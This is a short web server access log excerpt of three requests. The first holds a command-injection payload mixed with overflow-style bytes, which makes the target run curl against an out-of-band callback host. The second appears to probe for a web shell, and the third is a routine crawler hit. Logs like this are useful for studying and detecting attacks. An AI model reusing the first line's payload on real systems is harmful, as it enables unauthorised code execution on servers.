157.20.32.210 - - [18/Oct/2025:08:50:23 -0400] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d3pm34ikdbcl3g7iqchg6ow1f1wpwei79.oast.pro+-H+%27User-Agent:+zRMTN5%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d3pm34ikdbcl3g7iqchgb6sh93pxr1uwx.oast.pro+-H+%27User-Agent:+zRMTN5%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; es-es) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
51.79.229.86 - - [18/Oct/2025:08:50:24 -0400] "GET /cong.PHP HTTP/1.1" 404 10904 "http://salhab360photos.com/cong.PHP" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:50:33 -0400] "GET /products130168472?kg=0128581133 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
